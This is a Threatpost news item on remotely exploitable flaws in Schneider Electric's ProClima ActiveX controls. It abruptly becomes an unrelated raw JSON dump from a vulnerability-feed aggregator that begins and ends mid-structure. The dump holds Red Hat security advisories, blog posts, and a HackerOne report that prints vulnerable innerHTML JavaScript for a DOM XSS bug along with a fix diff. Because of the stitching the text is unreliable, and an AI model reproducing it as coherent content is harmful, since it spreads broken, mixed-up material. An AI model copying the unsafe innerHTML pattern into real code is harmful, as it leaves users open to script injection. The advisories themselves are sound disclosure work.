Critical Remotely Exploitable Bugs Found in Schneider Electric ProClima Software
2014-12-18T10:58:00
ID: CRITICAL-REMOTELY-EXPLOITABLE-BUGS-FOUND-IN-SCHNEIDER-ELECTRIC-PROCLIMA-SOFTWARE/109961 | Type: threatpost | Reporter: Dennis Fisher | Modified: 2014-12-18T15:58:29
Description
There are a number of critical, remotely exploitable command injection vulnerabilities in Schneider Electric’s ProClima software, which is used in manufacturing and energy facilities.
The ProClima application is a utility that customers use to design control panel enclosures in industrial facilities to help manage the heat from enclosed electrical devices. The bugs affect ProClima versions 6.0.1 and earlier, according to an advisory released by ICS-CERT (https://ics-cert.us-cert.gov/advisories/ICSA-14-350-01). The flaws exist in two separate components of the ProClima software, MDraw30.ocx and Atx45.ocx.
“MDraw30.ocx control can be initialized and called by malicious scripts potentially causing buffer overflows, which may allow an attacker to execute code remotely,” the advisory says.
The same scenario is true for the vulnerabilities in Atx45.ocx. All of the vulnerabilities can be exploited remotely, and ICS-CERT said that an attacker with relatively low skills would be able to exploit the bugs. There aren’t any known exploits for the vulnerabilities at this point, however.
The vendor has pushed out a new version of the ProClima package that contains fixes for the vulnerabilities.
“Schneider Electric has released an updated version of the ProClima software, Version 6.1.7, which mitigates these vulnerabilities. Customers are encouraged to download the new version and update their installations. It is important that customers first uninstall the current version,” the ICS-CERT advisory says.
The vulnerabilities were reported to Schneider Electric by Ariele Caltabiano, Andrea Micalizzi, and Brian Gorenc through the Zero Day Initiative.
"lt"}, {"OS": "RedHat", "OSVersion": "6", "packageVersion": "2.6-8.el6_9", "arch": "i686", "packageName": "patch-debuginfo", "packageFilename": "patch-debuginfo-2.6-8.el6_9.i686.rpm", "operator": "lt"}, {"OS": "RedHat", "OSVersion": "6", "packageVersion": "2.6-8.el6_9", "arch": "ppc64", "packageName": "patch-debuginfo", "packageFilename": "patch-debuginfo-2.6-8.el6_9.ppc64.rpm", "operator": "lt"}, {"OS": "RedHat", "OSVersion": "6", "packageVersion": "2.6-8.el6_9", "arch": "s390x", "packageName": "patch-debuginfo", "packageFilename": "patch-debuginfo-2.6-8.el6_9.s390x.rpm", "operator": "lt"}, {"OS": "RedHat", "OSVersion": "6", "packageVersion": "2.6-8.el6_9", "arch": "x86_64", "packageName": "patch-debuginfo", "packageFilename": "patch-debuginfo-2.6-8.el6_9.x86_64.rpm", "operator": "lt"}], "description": "The patch program applies diff files to originals. The diff command is used to compare an original to a changed file. Diff lists the changes made to the file. A person who has the original file can then use the patch command with the diff file to add the changes to their original file (patching the file).\n\nPatch should be installed because it is a common way of upgrading applications.\n\nSecurity Fix(es):\n\n* patch: Malicious patch files cause ed to execute arbitrary commands (CVE-2018-1000156)\n\nFor more details about the security issue(s), including the impact, a CVSS score, and other related information, refer to the CVE page(s) listed in the References section.", "reporter": "RedHat", "published": "2018-04-23T20:30:19", "type": "redhat", "title": "(RHSA-2018:1199) Important: patch security update", "enchantments": {}, "bulletinFamily": "unix", "cvelist": ["CVE-2018-1000156"], "_object_type": "robots.models.redhat.RedHatBulletin", "modified": "2018-04-23T20:33:18", "id": "RHSA-2018:1199", "href": "https://access.redhat.com/errata/RHSA-2018:1199", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2018-04-23T12:42:41", "_object_types": 
["robots.models.redhat.RedHatBulletin", "robots.models.base.Bulletin"], "references": [], "affectedPackage": [{"OS": "RedHat", "OSVersion": "5", "packageVersion": "2.6.18-430.el5", "arch": "i686", "packageName": "kernel", "packageFilename": "kernel-2.6.18-430.el5.i686.rpm", "operator": "lt"}, {"OS": "RedHat", "OSVersion": "5", "packageVersion": "2.6.18-430.el5", "arch": "s390x", "packageName": "kernel", "packageFilename": "kernel-2.6.18-430.el5.s390x.rpm", "operator": "lt"}, {"OS": "RedHat", "OSVersion": "5", "packageVersion": "2.6.18-430.el5", "arch": "src", "packageName": "kernel", "packageFilename": "kernel-2.6.18-430.el5.src.rpm", "operator": "lt"}, {"OS": "RedHat", "OSVersion": "5", "packageVersion": "2.6.18-430.el5", "arch": "x86_64", "packageName": "kernel", "packageFilename": "kernel-2.6.18-430.el5.x86_64.rpm", "operator": "lt"}, {"OS": "RedHat", "OSVersion": "5", "packageVersion": "2.6.18-430.el5", "arch": "i686", "packageName": "kernel-PAE", "packageFilename": "kernel-PAE-2.6.18-430.el5.i686.rpm", "operator": "lt"}, {"OS": "RedHat", "OSVersion": "5", "packageVersion": "2.6.18-430.el5", "arch": "i686", "packageName": "kernel-PAE-debuginfo", "packageFilename": "kernel-PAE-debuginfo-2.6.18-430.el5.i686.rpm", "operator": "lt"}, {"OS": "RedHat", "OSVersion": "5", "packageVersion": "2.6.18-430.el5", "arch": "i686", "packageName": "kernel-PAE-devel", "packageFilename": "kernel-PAE-devel-2.6.18-430.el5.i686.rpm", "operator": "lt"}, {"OS": "RedHat", "OSVersion": "5", "packageVersion": "2.6.18-430.el5", "arch": "i686", "packageName": "kernel-debug", "packageFilename": "kernel-debug-2.6.18-430.el5.i686.rpm", "operator": "lt"}, {"OS": "RedHat", "OSVersion": "5", "packageVersion": "2.6.18-430.el5", "arch": "s390x", "packageName": "kernel-debug", "packageFilename": "kernel-debug-2.6.18-430.el5.s390x.rpm", "operator": "lt"}, {"OS": "RedHat", "OSVersion": "5", "packageVersion": "2.6.18-430.el5", "arch": "x86_64", "packageName": "kernel-debug", "packageFilename": 
"kernel-debug-2.6.18-430.el5.x86_64.rpm", "operator": "lt"}, {"OS": "RedHat", "OSVersion": "5", "packageVersion": "2.6.18-430.el5", "arch": "i686", "packageName": "kernel-debug-debuginfo", "packageFilename": "kernel-debug-debuginfo-2.6.18-430.el5.i686.rpm", "operator": "lt"}, {"OS": "RedHat", "OSVersion": "5", "packageVersion": "2.6.18-430.el5", "arch": "s390x", "packageName": "kernel-debug-debuginfo", "packageFilename": "kernel-debug-debuginfo-2.6.18-430.el5.s390x.rpm", "operator": "lt"}, {"OS": "RedHat", "OSVersion": "5", "packageVersion": "2.6.18-430.el5", "arch": "x86_64", "packageName": "kernel-debug-debuginfo", "packageFilename": "kernel-debug-debuginfo-2.6.18-430.el5.x86_64.rpm", "operator": "lt"}, {"OS": "RedHat", "OSVersion": "5", "packageVersion": "2.6.18-430.el5", "arch": "i686", "packageName": "kernel-debug-devel", "packageFilename": "kernel-debug-devel-2.6.18-430.el5.i686.rpm", "operator": "lt"}, {"OS": "RedHat", "OSVersion": "5", "packageVersion": "2.6.18-430.el5", "arch": "s390x", "packageName": "kernel-debug-devel", "packageFilename": "kernel-debug-devel-2.6.18-430.el5.s390x.rpm", "operator": "lt"}, {"OS": "RedHat", "OSVersion": "5", "packageVersion": "2.6.18-430.el5", "arch": "x86_64", "packageName": "kernel-debug-devel", "packageFilename": "kernel-debug-devel-2.6.18-430.el5.x86_64.rpm", "operator": "lt"}, {"OS": "RedHat", "OSVersion": "5", "packageVersion": "2.6.18-430.el5", "arch": "i686", "packageName": "kernel-debuginfo", "packageFilename": "kernel-debuginfo-2.6.18-430.el5.i686.rpm", "operator": "lt"}, {"OS": "RedHat", "OSVersion": "5", "packageVersion": "2.6.18-430.el5", "arch": "s390x", "packageName": "kernel-debuginfo", "packageFilename": "kernel-debuginfo-2.6.18-430.el5.s390x.rpm", "operator": "lt"}, {"OS": "RedHat", "OSVersion": "5", "packageVersion": "2.6.18-430.el5", "arch": "x86_64", "packageName": "kernel-debuginfo", "packageFilename": "kernel-debuginfo-2.6.18-430.el5.x86_64.rpm", "operator": "lt"}, {"OS": "RedHat", "OSVersion": "5", 
"packageVersion": "2.6.18-430.el5", "arch": "i686", "packageName": "kernel-debuginfo-common", "packageFilename": "kernel-debuginfo-common-2.6.18-430.el5.i686.rpm", "operator": "lt"}, {"OS": "RedHat", "OSVersion": "5", "packageVersion": "2.6.18-430.el5", "arch": "s390x", "packageName": "kernel-debuginfo-common", "packageFilename": "kernel-debuginfo-common-2.6.18-430.el5.s390x.rpm", "operator": "lt"}, {"OS": "RedHat", "OSVersion": "5", "packageVersion": "2.6.18-430.el5", "arch": "x86_64", "packageName": "kernel-debuginfo-common", "packageFilename": "kernel-debuginfo-common-2.6.18-430.el5.x86_64.rpm", "operator": "lt"}, {"OS": "RedHat", "OSVersion": "5", "packageVersion": "2.6.18-430.el5", "arch": "i686", "packageName": "kernel-devel", "packageFilename": "kernel-devel-2.6.18-430.el5.i686.rpm", "operator": "lt"}, {"OS": "RedHat", "OSVersion": "5", "packageVersion": "2.6.18-430.el5", "arch": "s390x", "packageName": "kernel-devel", "packageFilename": "kernel-devel-2.6.18-430.el5.s390x.rpm", "operator": "lt"}, {"OS": "RedHat", "OSVersion": "5", "packageVersion": "2.6.18-430.el5", "arch": "x86_64", "packageName": "kernel-devel", "packageFilename": "kernel-devel-2.6.18-430.el5.x86_64.rpm", "operator": "lt"}, {"OS": "RedHat", "OSVersion": "5", "packageVersion": "2.6.18-430.el5", "arch": "noarch", "packageName": "kernel-doc", "packageFilename": "kernel-doc-2.6.18-430.el5.noarch.rpm", "operator": "lt"}, {"OS": "RedHat", "OSVersion": "5", "packageVersion": "2.6.18-430.el5", "arch": "i386", "packageName": "kernel-headers", "packageFilename": "kernel-headers-2.6.18-430.el5.i386.rpm", "operator": "lt"}, {"OS": "RedHat", "OSVersion": "5", "packageVersion": "2.6.18-430.el5", "arch": "s390x", "packageName": "kernel-headers", "packageFilename": "kernel-headers-2.6.18-430.el5.s390x.rpm", "operator": "lt"}, {"OS": "RedHat", "OSVersion": "5", "packageVersion": "2.6.18-430.el5", "arch": "x86_64", "packageName": "kernel-headers", "packageFilename": 
"kernel-headers-2.6.18-430.el5.x86_64.rpm", "operator": "lt"}, {"OS": "RedHat", "OSVersion": "5", "packageVersion": "2.6.18-430.el5", "arch": "s390x", "packageName": "kernel-kdump", "packageFilename": "kernel-kdump-2.6.18-430.el5.s390x.rpm", "operator": "lt"}, {"OS": "RedHat", "OSVersion": "5", "packageVersion": "2.6.18-430.el5", "arch": "s390x", "packageName": "kernel-kdump-debuginfo", "packageFilename": "kernel-kdump-debuginfo-2.6.18-430.el5.s390x.rpm", "operator": "lt"}, {"OS": "RedHat", "OSVersion": "5", "packageVersion": "2.6.18-430.el5", "arch": "s390x", "packageName": "kernel-kdump-devel", "packageFilename": "kernel-kdump-devel-2.6.18-430.el5.s390x.rpm", "operator": "lt"}, {"OS": "RedHat", "OSVersion": "5", "packageVersion": "2.6.18-430.el5", "arch": "i686", "packageName": "kernel-xen", "packageFilename": "kernel-xen-2.6.18-430.el5.i686.rpm", "operator": "lt"}, {"OS": "RedHat", "OSVersion": "5", "packageVersion": "2.6.18-430.el5", "arch": "x86_64", "packageName": "kernel-xen", "packageFilename": "kernel-xen-2.6.18-430.el5.x86_64.rpm", "operator": "lt"}, {"OS": "RedHat", "OSVersion": "5", "packageVersion": "2.6.18-430.el5", "arch": "i686", "packageName": "kernel-xen-debuginfo", "packageFilename": "kernel-xen-debuginfo-2.6.18-430.el5.i686.rpm", "operator": "lt"}, {"OS": "RedHat", "OSVersion": "5", "packageVersion": "2.6.18-430.el5", "arch": "x86_64", "packageName": "kernel-xen-debuginfo", "packageFilename": "kernel-xen-debuginfo-2.6.18-430.el5.x86_64.rpm", "operator": "lt"}, {"OS": "RedHat", "OSVersion": "5", "packageVersion": "2.6.18-430.el5", "arch": "i686", "packageName": "kernel-xen-devel", "packageFilename": "kernel-xen-devel-2.6.18-430.el5.i686.rpm", "operator": "lt"}, {"OS": "RedHat", "OSVersion": "5", "packageVersion": "2.6.18-430.el5", "arch": "x86_64", "packageName": "kernel-xen-devel", "packageFilename": "kernel-xen-devel-2.6.18-430.el5.x86_64.rpm", "operator": "lt"}], "description": "The kernel packages contain the Linux kernel, the core of any 
Linux operating system.\n\nSecurity Fix(es):\n\n* An industry-wide issue was found in the way many modern microprocessor designs have implemented speculative execution of instructions (a commonly used performance optimization). There are three primary variants of the issue which differ in the way the speculative execution can be exploited. Variant CVE-2017-5715 triggers the speculative execution by utilizing branch target injection. It relies on the presence of a precisely-defined instruction sequence in the privileged code as well as the fact that memory accesses may cause allocation into the microprocessor's data cache even for speculatively executed instructions that never actually commit (retire). As a result, an unprivileged attacker could use this flaw to cross the syscall and guest/host boundaries and read privileged memory by conducting targeted cache side-channel attacks. (CVE-2017-5715, Important, x86-64)\n\nRed Hat would like to thank Google Project Zero for reporting this issue.\n\nBug Fix(es):\n\n* The Return Trampolines (Retpolines) mechanism is a software construct that leverages specific knowledge of the underlying hardware to mitigate the branch target injection, also known as Spectre variant 2 vulnerability described in CVE-2017-5715. With this update, the support for Retpolines has been implemented into the Red Hat Enterprise Linux kernel. 
(BZ#1535650)", "reporter": "RedHat", "published": "2018-04-23T16:27:20", "type": "redhat", "title": "(RHSA-2018:1196) Important: kernel security and bug fix update", "enchantments": {}, "bulletinFamily": "unix", "cvelist": ["CVE-2017-5715"], "_object_type": "robots.models.redhat.RedHatBulletin", "modified": "2018-04-23T16:29:58", "id": "RHSA-2018:1196", "href": "https://access.redhat.com/errata/RHSA-2018:1196", "cvss": {"score": 4.7, "vector": "AV:LOCAL/AC:MEDIUM/Au:NONE/C:COMPLETE/I:NONE/A:NONE/"}}, {"lastseen": "2018-04-23T12:41:55", "_object_types": ["robots.models.redhat.RedHatBulletin", "robots.models.base.Bulletin"], "references": [], "affectedPackage": [{"OS": "RedHat", "OSVersion": "6", "packageVersion": "66.0.3359.117-1.el6_9", "arch": "i686", "packageName": "chromium-browser", "packageFilename": "chromium-browser-66.0.3359.117-1.el6_9.i686.rpm", "operator": "lt"}, {"OS": "RedHat", "OSVersion": "6", "packageVersion": "66.0.3359.117-1.el6_9", "arch": "x86_64", "packageName": "chromium-browser", "packageFilename": "chromium-browser-66.0.3359.117-1.el6_9.x86_64.rpm", "operator": "lt"}, {"OS": "RedHat", "OSVersion": "6", "packageVersion": "66.0.3359.117-1.el6_9", "arch": "i686", "packageName": "chromium-browser-debuginfo", "packageFilename": "chromium-browser-debuginfo-66.0.3359.117-1.el6_9.i686.rpm", "operator": "lt"}, {"OS": "RedHat", "OSVersion": "6", "packageVersion": "66.0.3359.117-1.el6_9", "arch": "x86_64", "packageName": "chromium-browser-debuginfo", "packageFilename": "chromium-browser-debuginfo-66.0.3359.117-1.el6_9.x86_64.rpm", "operator": "lt"}], "description": "Chromium is an open-source web browser, powered by WebKit (Blink).\n\nThis update upgrades Chromium to version 66.0.3359.117.\n\nSecurity Fix(es):\n\n* chromium-browser: Use after free in Disk Cache (CVE-2018-6085)\n\n* chromium-browser: Use after free in Disk Cache (CVE-2018-6086)\n\n* chromium-browser: Use after free in WebAssembly (CVE-2018-6087)\n\n* chromium-browser: Use after free in 
PDFium (CVE-2018-6088)\n\n* chromium-browser: Same origin policy bypass in Service Worker (CVE-2018-6089)\n\n* chromium-browser: Heap buffer overflow in Skia (CVE-2018-6090)\n\n* chromium-browser: Incorrect handling of plug-ins by Service Worker (CVE-2018-6091)\n\n* chromium-browser: Integer overflow in WebAssembly (CVE-2018-6092)\n\n* chromium-browser: Same origin bypass in Service Worker (CVE-2018-6093)\n\n* chromium-browser: Exploit hardening regression in Oilpan (CVE-2018-6094)\n\n* chromium-browser: Lack of meaningful user interaction requirement before file upload (CVE-2018-6095)\n\n* chromium-browser: Fullscreen UI spoof (CVE-2018-6096)\n\n* chromium-browser: Fullscreen UI spoof (CVE-2018-6097)\n\n* chromium-browser: URL spoof in Omnibox (CVE-2018-6098)\n\n* chromium-browser: CORS bypass in ServiceWorker (CVE-2018-6099)\n\n* chromium-browser: URL spoof in Omnibox (CVE-2018-6100)\n\n* chromium-browser: Insufficient protection of remote debugging protocol in DevTools (CVE-2018-6101)\n\n* chromium-browser: URL spoof in Omnibox (CVE-2018-6102)\n\n* chromium-browser: UI spoof in Permissions (CVE-2018-6103)\n\n* chromium-browser: URL spoof in Omnibox (CVE-2018-6104)\n\n* chromium-browser: URL spoof in Omnibox (CVE-2018-6105)\n\n* chromium-browser: Incorrect handling of promises in V8 (CVE-2018-6106)\n\n* chromium-browser: URL spoof in Omnibox (CVE-2018-6107)\n\n* chromium-browser: URL spoof in Omnibox (CVE-2018-6108)\n\n* chromium-browser: Incorrect handling of files by FileAPI (CVE-2018-6109)\n\n* chromium-browser: Incorrect handling of plaintext files via file:// (CVE-2018-6110)\n\n* chromium-browser: Heap-use-after-free in DevTools (CVE-2018-6111)\n\n* chromium-browser: Incorrect URL handling in DevTools (CVE-2018-6112)\n\n* chromium-browser: URL spoof in Navigation (CVE-2018-6113)\n\n* chromium-browser: CSP bypass (CVE-2018-6114)\n\n* chromium-browser: Incorrect low memory handling in WebAssembly (CVE-2018-6116)\n\n* chromium-browser: Confusing autofill 
settings (CVE-2018-6117)\n\nFor more details about the security issue(s), including the impact, a CVSS score, and other related information, refer to the CVE page(s) listed in the References section.", "reporter": "RedHat", "published": "2018-04-23T16:24:32", "type": "redhat", "title": "(RHSA-2018:1195) Critical: chromium-browser security update", "enchantments": {}, "bulletinFamily": "unix", "cvelist": ["CVE-2018-6085", "CVE-2018-6086", "CVE-2018-6087", "CVE-2018-6088", "CVE-2018-6089", "CVE-2018-6090", "CVE-2018-6091", "CVE-2018-6092", "CVE-2018-6093", "CVE-2018-6094", "CVE-2018-6095", "CVE-2018-6096", "CVE-2018-6097", "CVE-2018-6098", "CVE-2018-6099", "CVE-2018-6100", "CVE-2018-6101", "CVE-2018-6102", "CVE-2018-6103", "CVE-2018-6104", "CVE-2018-6105", "CVE-2018-6106", "CVE-2018-6107", "CVE-2018-6108", "CVE-2018-6109", "CVE-2018-6110", "CVE-2018-6111", "CVE-2018-6112", "CVE-2018-6113", "CVE-2018-6114", "CVE-2018-6116", "CVE-2018-6117"], "_object_type": "robots.models.redhat.RedHatBulletin", "modified": "2018-04-23T16:26:16", "id": "RHSA-2018:1195", "href": "https://access.redhat.com/errata/RHSA-2018:1195", "cvss": {"score": 0.0, "vector": "NONE"}}], "malwarebytes": [{"lastseen": "2018-04-23T16:36:36", "_object_types": ["robots.models.rss.RssBulletin", "robots.models.base.Bulletin"], "references": [], "description": "Last week, we took [a stroll down memory lane](<https://blog.malwarebytes.com/cybercrime/2018/04/myspace-vs-facebook-good-old-days/>) talking about Facebook and MySpace, noticed [a change](<https://blog.malwarebytes.com/threat-analysis/2018/04/magnitude-exploit-kit-switches-gandcrab-ransomware/>) in the Magnitude exploit kit\u2014wherein it started adopting the [GandCrab ransomware](<https://blog.malwarebytes.com/threat-analysis/2018/01/gandcrab-ransomware-distributed-by-rig-and-grandsoft-exploit-kits/>), took a good look at [a new form of adware](<https://blog.malwarebytes.com/threat-analysis/2018/04/pbot-python-based-adware/>) that is based on 
Python, chatted a bit [about Russian hacking](<https://blog.malwarebytes.com/cybercrime/2018/04/perspectives-on-russian-hacking/>) with a journalist, encouraged retailers to [ask the right questions](<https://blog.malwarebytes.com/101/2018/04/5-cybersecurity-questions-retailers-must-ask-protect-businesses/>) to protect their business, and weighed in on [a way to speed up Internet bandwidth and increase privacy](<https://blog.malwarebytes.com/101/how-tos/2018/04/cloudflares-new-dns-service/>) via Cloudflare's new DNS service.\n\n### Other news\n\n * Cryptocurrency is all the rave these days\u2014and so are cryptominers. Security researchers recently discovered one that [doesn't rely on an open browser session](<https://www.hackread.com/malware-mine-cryptocurrency-without-open-browser-session/>). (Source: HackRead)\n * Tax fraud is no longer for the clueless, it seems. Experts noticed that scammers are [also targeting tax professionals](<https://www.cnbc.com/2018/04/14/cybercriminals-now-targeting-tax-pros-to-cash-in-on-fraudulent-returns.html>)\u2014those filing taxes on behalf of their clients. (Source: CNBC)\n * To date, adware, spyware, and malware have lurked inside the Google Play Store. But [surveillanceware](<https://blog.lookout.com/desert-scorpion-google-play>)? That's definitely something new. (Source: Lookout Blog)\n * At the recently concluded RSA conference, tech companies like Microsoft and Facebook [joined together to sign a pledge](<https://www.zdnet.com/article/microsoft-facebook-dozens-more-sign-cybersecurity-tech-accord/>) to protect users and refrain from helping any government launch a cyberattack. (Source: ZDNet)\n * While the usage of Adobe Flash has significantly decreased, [this doesn't mean that the threats exploiting them have declined](<https://securingtomorrow.mcafee.com/mcafee-labs/despite-decline-use-adobe-flash-vulnerabilities-will-continue-cause-concern/>). So remain vigilant! 
(Source: McAfee's Securing Tomorrow Blog)\n * Gmail's new \"Confidential Mode\" is [not entirely private](<https://nakedsecurity.sophos.com/2018/04/17/gmails-new-confidential-mode-wont-be-completely-private/>) after all. SIGH. (Source: Sophos's Naked Security Blog)\n * Security researchers noticed [an increased activity of APT groups](<https://www.scmagazineuk.com/new-hacker-groups-emerging-in-asia-and-in-the-middle-east-finds-kaspersky/article/759368/>) based in Asia and the Middle East. (Source: SC Magazine)\n * Here's a new word to keep in mind: [_trustjacking_.](<https://www.wired.com/story/trustjacking-ios-itunes-wi-fi-sync-attack/>) And iPhone users are particularly at risk of this one. (Source: Wired)\n * [Stresspaint](<https://www.bleepingcomputer.com/news/security/stresspaint-malware-steals-facebook-credentials-and-session-cookies/>), a new information stealer, is a type of malware that is after Chrome login data, session cookies, and appears to be particularly interested in Facebook details. (Source: Bleeping Computer)\n * A ransomware variant appeared to be [repurposed](<https://www.zdnet.com/article/this-ransomware-was-rewritten-to-mine-cryptocurrency-and-destroy-your-files/>) to infect files, mine for cryptocurrency\u2026and destroy affected users' files. Good grief! 
(Source: ZDNet)\n\nStay safe, everyone!\n\nThe post [A week in security (April 16 \u2013 April 22)](<https://blog.malwarebytes.com/security-world/2018/04/week-security-april-16-april-22/>) appeared first on [Malwarebytes Labs](<https://blog.malwarebytes.com>).", "reporter": "Malwarebytes Labs", "published": "2018-04-23T16:06:58", "type": "malwarebytes", "title": "A week in security (April 16 \u2013 April 22)", "enchantments": {}, "bulletinFamily": "blog", "cvelist": [], "_object_type": "robots.models.rss.RssBulletin", "modified": "2018-04-23T16:06:58", "id": "MALWAREBYTES:148F6C7338860226F9178BF5B447E08B", "href": "https://blog.malwarebytes.com/security-world/2018/04/week-security-april-16-april-22/", "cvss": {"score": 0.0, "vector": "NONE"}}], "carbonblack": [{"lastseen": "2018-04-23T16:39:10", "_object_types": ["robots.models.base.Bulletin", "robots.models.rss.RssBulletin"], "references": [], "description": "At Carbon Black, keeping our customers\u2019 data safe is a top priority.\n\nThe European Union\u2019s General Data Protection Regulation (\u201cGDPR\u201d), a comprehensive European privacy law that takes effect on May 25, 2018, has shined a light on the importance of securing personal data. The GDPR is designed to harmonize data protection laws across the European Union (\u201cEU\u201d) and protect the privacy of the personal data of EU data subjects. GDPR also serves as an opportunity for Carbon Black to continue our commitment to keeping our customers protected. \n\nWe take data protection seriously for all of our customers and have been working to uphold the highest standards of privacy. 
We have approached our GDPR preparation activities with that in mind, and are finalizing the updates and changes to our data processing policies, operations, activities and documentation in anticipation of the upcoming GDPR effective date.\n\nWe have established a robust GDPR compliance program designed to ensure strong protection and secure processing of our customers\u2019 personal data. To learn more about our approach to \u201cSecurity and Privacy by Design,\u201d I encourage you to read the materials listed on our [Product Security page](<https://www.carbonblack.com/why-cb/product-security/>).\n\nIn addition to [our own GDPR compliance efforts](<https://www.carbonblack.com/why-cb/product-security/corporate-gdpr-readiness/>), Carbon Black\u2019s products and services can help support our customers\u2019 security, risk, and compliance program efforts relating to GDPR and other privacy regulations. [You can learn more](<https://www.carbonblack.com/products/solutions/use-case/risk-and-compliance/gdpr/>)_ about how here. _\n\nAt Carbon Black we take data protection seriously within our own systems, striving to deliver the highest levels of security and privacy for your data. I encourage you to review the documents referenced above to further understand the thoroughness and completeness of our security and privacy practices. 
If you have additional, more specific questions relating to Carbon Black\u2019s internal GDPR compliance activities, I invite you to contact our compliance team at [privacy@carbonblack.com](<mailto:privacy@carbonblack.com>).\n\nThe post [Carbon Black's Commitment to GDPR & Keeping Customer Data Safe](<https://www.carbonblack.com/2018/04/23/carbon-blacks-commitment-gdpr-keeping-customer-data-safe/>) appeared first on [Carbon Black](<https://www.carbonblack.com>).", "reporter": "Ryan Murphy", "published": "2018-04-23T15:36:28", "type": "carbonblack", "title": "Carbon Black\u2019s Commitment to GDPR & Keeping Customer Data Safe", "enchantments": {}, "bulletinFamily": "blog", "cvelist": [], "_object_type": "robots.models.rss.RssBulletin", "modified": "2018-04-23T15:36:28", "id": "CARBONBLACK:F8AB6DE17F25B557EDD29B7DCFA4EDBA", "href": "https://www.carbonblack.com/2018/04/23/carbon-blacks-commitment-gdpr-keeping-customer-data-safe/", "cvss": {"score": 0.0, "vector": "NONE"}}], "hackerone": [{"lastseen": "2018-04-23T15:34:18", "references": [], "bounty": 0.0, "h1team": {"profile_picture_urls": {"small": "https://profile-photos.hackerone-user-content.com/000/024/342/c0710f1ee32ac577833e15c7883ae5724fb52f9d_small.?1510424447", "medium": "https://profile-photos.hackerone-user-content.com/000/024/342/26e2ce2d50254c283beb49a15389d98bee2985b1_medium.?1510424447"}, "handle": "ed", "url": "https://hackerone.com/ed"}, "bountyState": "resolved", "description": "Hi,\n\nThere's a DOM XSS vulnerability on [edoverflow.com](https://edoverflow.com/tools/respond/). This cannot be exploited without user-interaction so I had to make a clickjacking PoC to trick the user in triggering the payload her/himself.\n\n#Reproduction Steps\n1. Open the attached HTML document in FireFox.\n2. Drag Frog 1 to the other (two) frogs.\n3. 
Click on the \"Make friends!\" button.\n\nResult: \n{F289573}\n\n# Vulnerable JavaScript\n\n```\n<html>\n<script>\n/* ===========================================\n Allow users to submit usernames and store \n them in localStorage for future use.\n============================================*/\ndocument.getElementById(\"form\").addEventListener(\"submit\", function(){\n var triager = document.getElementById(\"triager\").value;\n var hacker = document.getElementById(\"hacker\").value;\n console.log(hacker); // Why is this not executing?\n document.body.innerHTML = document.body.innerHTML.replace('{{triager}}', triager);\n document.body.innerHTML = document.body.innerHTML.replace('{{username}}', hacker);\n //localStorage.setItem(\"triager\", triager);\n\n//var retrieve = localStorage.getItem(\"triager\"); // Why does this return \"null\"?\n//document.body.innerHTML = document.body.innerHTML.replace('{{triager}}', retriev\ndocument.getElementById(\"remove\").addEventListener(\"click\", function(){\n localStorage.removeItem(\"triager\");\n});\n</script>\n</html>\n```\n\n#Fix\n\n~~~diff\n- <input type=\"submit\" name=\"submit\" class=\"button\">\n+ <input type=\"button\" class=\"button\" id=\"submit\">\n~~~\n\n~~~diff\n Allow users to submit usernames and store \n them in localStorage for future use.\n ============================================*/\n- document.getElementById(\"form\").addEventListener(\"submit\", function(){\n- var triager = document.getElementById(\"triager\").value;\n- var hacker = document.getElementById(\"hacker\").value;\n+ elem = document.getElementsByTagName(\"pre\")[0].children[0];\n+\n+ document.getElementById(\"submit\").addEventListener(\"click\", function(){\n+ var trger = document.getElementById(\"triager\").value;\n+ var hckr = document.getElementById(\"hacker\").value;\n console.log(hacker); // Why is this not executing?\n- document.body.innerHTML = document.body.innerHTML.replace('{{triager}}', triager);\n- document.body.innerHTML = 
document.body.innerHTML.replace('{{username}}', hacker);\n- //localStorage.setItem(\"triager\", triager);\n+ elem.innerText = elem.innerText.replace(\"{{username}}\", trger).replace(\"{{triager}}\", hckr);\n+ localStorage.setItem(\"triager\", trger);\n });\n \n- //var retrieve = localStorage.getItem(\"triager\"); // Why does this return \"null\"?\n- //document.body.innerHTML = document.body.innerHTML.replace('{{triager}}', retrieve);\n+ if(localStorage.getItem(\"triager\") != null) {\n+ var trger = localStorage.getItem(\"triager\"); // Why does this return \"null\"?\n+ elem.innerText = elem.innerText.replace(\"{{triager}}\", trger);\n+ }\n \n document.getElementById(\"remove\").addEventListener(\"click\", function(){\n localStorage.removeItem(\"triager\");\n });\n\n~~~\n\nRaw (JS attached)\n\n## Impact\n\nThere is not much that can be done because it looks like most pages don't require authentication, I also don't think that the owner of this website would fall for something like this. ;)\n\n\nThanks,\nKarel.\n\nThe hacker selected the **Cross-site Scripting (XSS) - DOM** weakness. This vulnerability type requires contextual information from the hacker. 
They provided the following answers:\n\n**URL**\nhttps://edoverflow.com/tools/respond/\n\n**Verified**\nYes\n\n", "edition": 1, "reporter": "karel_origin", "published": "2018-04-23T11:01:15", "title": "Ed: DOM XSS in edoverflow.com/tools/respond due to unsafe usage of the innerHTML property.", "type": "hackerone", "enchantments": {}, "h1reporter": {"profile_picture_urls": {"small": "https://profile-photos.hackerone-user-content.com/000/077/693/7a4e7b987a654de89c2495e1e443b7be6edb8db3_small.jpg?1467040011"}, "hacker_mediation": false, "disabled": false, "is_me?": false, "hackerone_triager": false, "url": "/karel_origin", "username": "karel_origin"}, "bulletinFamily": "bugbounty", "cvelist": [], "modified": "2018-04-23T11:28:11", "id": "H1:341969", "href": "https://hackerone.com/reports/341969", "cvss": {"score": 0.0, "vector": "NONE"}}], "securelist": [{"lastseen": "2018-04-23T16:36:57", "_object_types": ["robots.models.rss.RssBulletin", "robots.models.base.Bulletin"], "references": [], "description": "\n\n[_Energetic Bear/Crouching Yeti_](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2018/03/08080817/EB-YetiJuly2014-Public.pdf>)_ is a widely known APT group active since at least 2010. The group tends to attack different companies with a strong focus on the energy and industrial sectors. Companies attacked by Energetic Bear/Crouching Yeti are geographically distributed worldwide with a more obvious concentration in Europe and the US. In 2016-2017, the number of attacks on companies in Turkey increased significantly. _\n\n_The main tactics of the group include sending phishing emails with malicious documents and infecting various servers. The group uses some of the infected servers for auxiliary purposes \u2013 to host tools and logs. Others are deliberately infected to use them in waterhole attacks in order to reach the group's main targets. 
